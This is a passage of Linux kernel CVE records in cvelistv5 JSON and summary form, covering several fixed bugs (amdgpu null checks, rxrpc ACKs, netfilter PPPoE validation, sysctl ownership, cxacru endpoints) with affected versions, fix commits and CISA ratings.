"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "4cc2a94d96caeb3c975acdae7351c2f997c32175",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "1686675405d07f35eae7ff3d13a530034b899df2",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "8092aa3ab8f7b737a34b71f91492c676a843043a",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Add null checker before passing variables\n\nChecks null pointer before passing variables to functions.\n\nThis fixes 3 NULL_RETURNS issues reported by Coverity."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-11T17:20:08.426Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d0b8b23b9c2ebec693a36fea518d8f13493ad655"
},
{
"url": "https://git.kernel.org/stable/c/83c7f509ef087041604e9572938f82e18b724c9d"
},
{
"url": "https://git.kernel.org/stable/c/4cc2a94d96caeb3c975acdae7351c2f997c32175"
},
{
"url": "https://git.kernel.org/stable/c/1686675405d07f35eae7ff3d13a530034b899df2"
},
{
"url": "https://git.kernel.org/stable/c/8092aa3ab8f7b737a34b71f91492c676a843043a"
}
],
"title": "drm/amd/display: Add null checker before passing variables",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43902",
"datePublished": "2024-08-26T10:11:01.939Z",
"dateReserved": "2024-08-17T09:11:59.292Z",
"dateUpdated": "2025-07-11T17:20:08.426Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52905 (GCVE-0-2023-52905)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
octeontx2-pf: Fix resource leakage in VF driver unbind
resources allocated like mcam entries to support the Ntuple feature
and hash tables for the tc feature are not getting freed in driver
unbind. This patch fixes the issue.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:14.828340Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.804Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c8ca0ad10df08ea36bcac1288062d567d22604c9",
"status": "affected",
"version": "2da48943274712fc3204089d9a97078350765635",
"versionType": "git"
},
{
"lessThan": "53da7aec32982f5ee775b69dce06d63992ce4af3",
"status": "affected",
"version": "2da48943274712fc3204089d9a97078350765635",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: Fix resource leakage in VF driver unbind\n\nresources allocated like mcam entries to support the Ntuple feature\nand hash tables for the tc feature are not getting freed in driver\nunbind. This patch fixes the issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:44.838Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c8ca0ad10df08ea36bcac1288062d567d22604c9"
},
{
"url": "https://git.kernel.org/stable/c/53da7aec32982f5ee775b69dce06d63992ce4af3"
}
],
"title": "octeontx2-pf: Fix resource leakage in VF driver unbind",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52905",
"datePublished": "2024-08-21T06:10:46.057Z",
"dateReserved": "2024-08-21T06:07:11.015Z",
"dateUpdated": "2025-05-04T07:45:44.838Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26677 (GCVE-0-2024-26677)
Vulnerability from cvelistv5
Published
2024-04-02 07:01
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
rxrpc: Fix delayed ACKs to not set the reference serial number
Fix the construction of delayed ACKs to not set the reference serial number
as they can't be used as an RTT reference.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26677",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-02T14:58:11.213319Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:09.299Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/200cb50b9e154434470c8969d32474d38475acc2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/63719f490e6a89896e9a463d2b45e8203eab23ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e7870cf13d20f56bfc19f9c3e89707c69cf104ef"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rxrpc/ar-internal.h",
"net/rxrpc/call_event.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "200cb50b9e154434470c8969d32474d38475acc2",
"status": "affected",
"version": "17926a79320afa9b95df6b977b40cca6d8713cea",
"versionType": "git"
},
{
"lessThan": "63719f490e6a89896e9a463d2b45e8203eab23ae",
"status": "affected",
"version": "17926a79320afa9b95df6b977b40cca6d8713cea",
"versionType": "git"
},
{
"lessThan": "e7870cf13d20f56bfc19f9c3e89707c69cf104ef",
"status": "affected",
"version": "17926a79320afa9b95df6b977b40cca6d8713cea",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rxrpc/ar-internal.h",
"net/rxrpc/call_event.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.22"
},
{
"lessThan": "2.6.22",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Fix delayed ACKs to not set the reference serial number\n\nFix the construction of delayed ACKs to not set the reference serial number\nas they can\u0027t be used as an RTT reference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:44.855Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/200cb50b9e154434470c8969d32474d38475acc2"
},
{
"url": "https://git.kernel.org/stable/c/63719f490e6a89896e9a463d2b45e8203eab23ae"
},
{
"url": "https://git.kernel.org/stable/c/e7870cf13d20f56bfc19f9c3e89707c69cf104ef"
}
],
"title": "rxrpc: Fix delayed ACKs to not set the reference serial number",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26677",
"datePublished": "2024-04-02T07:01:41.569Z",
"dateReserved": "2024-02-19T14:20:24.151Z",
"dateUpdated": "2025-05-04T08:53:44.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27016 (GCVE-0-2024-27016)
Vulnerability from cvelistv5
Published
2024-05-01 05:29
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: flowtable: validate pppoe header
Ensure there is sufficient room to access the protocol field of the
PPPoe header. Validate it once before the flowtable lookup, then use a
helper function to access protocol field.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27016",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-17T15:04:34.814514Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T15:04:50.051Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d06977b9a4109f8738bb276125eb6a0b772bc433"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8bf7c76a2a207ca2b4cfda0a279192adf27678d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2471d271042ea18e8a6babc132a8716bb2f08b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf366ee3bc1b7d1c76a882640ba3b3f8f1039163"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87b3593bed1868b2d9fe096c01bcdf0ea86cbebf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/netfilter/nf_flow_table.h",
"net/netfilter/nf_flow_table_inet.c",
"net/netfilter/nf_flow_table_ip.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d06977b9a4109f8738bb276125eb6a0b772bc433",
"status": "affected",
"version": "72efd585f7144a047f7da63864284764596ccad9",
"versionType": "git"
},
{
"lessThan": "8bf7c76a2a207ca2b4cfda0a279192adf27678d7",
"status": "affected",
"version": "72efd585f7144a047f7da63864284764596ccad9",
"versionType": "git"
},
{
"lessThan": "a2471d271042ea18e8a6babc132a8716bb2f08b9",
"status": "affected",
"version": "72efd585f7144a047f7da63864284764596ccad9",
"versionType": "git"
},
{
"lessThan": "cf366ee3bc1b7d1c76a882640ba3b3f8f1039163",
"status": "affected",
"version": "72efd585f7144a047f7da63864284764596ccad9",
"versionType": "git"
},
{
"lessThan": "87b3593bed1868b2d9fe096c01bcdf0ea86cbebf",
"status": "affected",
"version": "72efd585f7144a047f7da63864284764596ccad9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/netfilter/nf_flow_table.h",
"net/netfilter/nf_flow_table_inet.c",
"net/netfilter/nf_flow_table_ip.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: flowtable: validate pppoe header\n\nEnsure there is sufficient room to access the protocol field of the\nPPPoe header. Validate it once before the flowtable lookup, then use a\nhelper function to access protocol field."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:14.615Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d06977b9a4109f8738bb276125eb6a0b772bc433"
},
{
"url": "https://git.kernel.org/stable/c/8bf7c76a2a207ca2b4cfda0a279192adf27678d7"
},
{
"url": "https://git.kernel.org/stable/c/a2471d271042ea18e8a6babc132a8716bb2f08b9"
},
{
"url": "https://git.kernel.org/stable/c/cf366ee3bc1b7d1c76a882640ba3b3f8f1039163"
},
{
"url": "https://git.kernel.org/stable/c/87b3593bed1868b2d9fe096c01bcdf0ea86cbebf"
}
],
"title": "netfilter: flowtable: validate pppoe header",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27016",
"datePublished": "2024-05-01T05:29:57.099Z",
"dateReserved": "2024-02-19T14:20:24.209Z",
"dateUpdated": "2025-05-04T09:02:14.615Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42312 (GCVE-0-2024-42312)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 12:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sysctl: always initialize i_uid/i_gid
Always initialize i_uid/i_gid inside the sysfs core so set_ownership()
can safely skip setting them.
Commit 5ec27ec735ba ("fs/proc/proc_sysctl.c: fix the default values of
i_uid/i_gid on /proc/sys inodes.") added defaults for i_uid/i_gid when
set_ownership() was not implemented. It also missed adjusting
net_ctl_set_ownership() to use the same default values in case the
computation of a better value failed.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf Version: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf Version: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf Version: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf Version: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf Version: 5ec27ec735ba0477d48c80561cc5e856f0c5dfaf Version: e83234d7ef237931148b4b17834dadf57eb46c12 Version: 2cbf2af144f0cd08a3361c6299b2e6086b7d21d9 Version: 2c7b50c7b1d036f71acd9a917a8cb0f9b6e43dab Version: 7eb45a94c279dd5af4cafaa738ae93737517eef4 Version: 14cc90952cef94bfa89a6b4a2f55fd9a70f50a16 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42312",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:55.484877Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:26.909Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/proc/proc_sysctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b2591c89a6e2858796111138c38fcb6851aa1955",
"status": "affected",
"version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
"versionType": "git"
},
{
"lessThan": "34a86adea1f2b3c3f9d864c8cce09dca644601ab",
"status": "affected",
"version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
"versionType": "git"
},
{
"lessThan": "1deae34db9f4f8e0e03f891be2e2e15c15c8ac05",
"status": "affected",
"version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
"versionType": "git"
},
{
"lessThan": "ffde3af4b29bf97d62d82e1d45275587e10a991a",
"status": "affected",
"version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
"versionType": "git"
},
{
"lessThan": "c7e2f43d182f5dde473389dbb39f16c9f0d64536",
"status": "affected",
"version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
"versionType": "git"
},
{
"lessThan": "98ca62ba9e2be5863c7d069f84f7166b45a5b2f4",
"status": "affected",
"version": "5ec27ec735ba0477d48c80561cc5e856f0c5dfaf",
"versionType": "git"
},
{
"status": "affected",
"version": "e83234d7ef237931148b4b17834dadf57eb46c12",
"versionType": "git"
},
{
"status": "affected",
"version": "2cbf2af144f0cd08a3361c6299b2e6086b7d21d9",
"versionType": "git"
},
{
"status": "affected",
"version": "2c7b50c7b1d036f71acd9a917a8cb0f9b6e43dab",
"versionType": "git"
},
{
"status": "affected",
"version": "7eb45a94c279dd5af4cafaa738ae93737517eef4",
"versionType": "git"
},
{
"status": "affected",
"version": "14cc90952cef94bfa89a6b4a2f55fd9a70f50a16",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/proc/proc_sysctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.104",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.187",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.135",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.61",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.1.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.2.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysctl: always initialize i_uid/i_gid\n\nAlways initialize i_uid/i_gid inside the sysfs core so set_ownership()\ncan safely skip setting them.\n\nCommit 5ec27ec735ba (\"fs/proc/proc_sysctl.c: fix the default values of\ni_uid/i_gid on /proc/sys inodes.\") added defaults for i_uid/i_gid when\nset_ownership() was not implemented. It also missed adjusting\nnet_ctl_set_ownership() to use the same default values in case the\ncomputation of a better value failed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:58:05.086Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b2591c89a6e2858796111138c38fcb6851aa1955"
},
{
"url": "https://git.kernel.org/stable/c/34a86adea1f2b3c3f9d864c8cce09dca644601ab"
},
{
"url": "https://git.kernel.org/stable/c/1deae34db9f4f8e0e03f891be2e2e15c15c8ac05"
},
{
"url": "https://git.kernel.org/stable/c/ffde3af4b29bf97d62d82e1d45275587e10a991a"
},
{
"url": "https://git.kernel.org/stable/c/c7e2f43d182f5dde473389dbb39f16c9f0d64536"
},
{
"url": "https://git.kernel.org/stable/c/98ca62ba9e2be5863c7d069f84f7166b45a5b2f4"
}
],
"title": "sysctl: always initialize i_uid/i_gid",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42312",
"datePublished": "2024-08-17T09:09:16.646Z",
"dateReserved": "2024-07-30T07:40:12.277Z",
"dateUpdated": "2025-05-04T12:58:05.086Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41097 (GCVE-0-2024-41097)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: atm: cxacru: fix endpoint checking in cxacru_bind()
Syzbot is still reporting quite an old issue [1] that occurs due to
incomplete checking of present usb endpoints. As such, wrong
endpoints types may be used at urb sumbitting stage which in turn
triggers a warning in usb_submit_urb().
Fix the issue by verifying that required endpoint types are present
for both in and out endpoints, taking into account cmd endpoint type.
Unfortunately, this patch has not been tested on real hardware.
[1] Syzbot report:
usb 1-1: BOGUS urb xfer, pipe 1 != type 3
WARNING: CPU: 0 PID: 8667 at drivers/usb/core/urb.c:502 usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502
Modules linked in:
CPU: 0 PID: 8667 Comm: kworker/0:4 Not tainted 5.14.0-rc4-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Workqueue: usb_hub_wq hub_event
RIP: 0010:usb_submit_urb+0xed2/0x18a0 drivers/usb/core/urb.c:502
...
Call Trace:
cxacru_cm+0x3c0/0x8e0 drivers/usb/atm/cxacru.c:649
cxacru_card_status+0x22/0xd0 drivers/usb/atm/cxacru.c:760
cxacru_bind+0x7ac/0x11a0 drivers/usb/atm/cxacru.c:1209
usbatm_usb_probe+0x321/0x1ae0 drivers/usb/atm/usbatm.c:1055
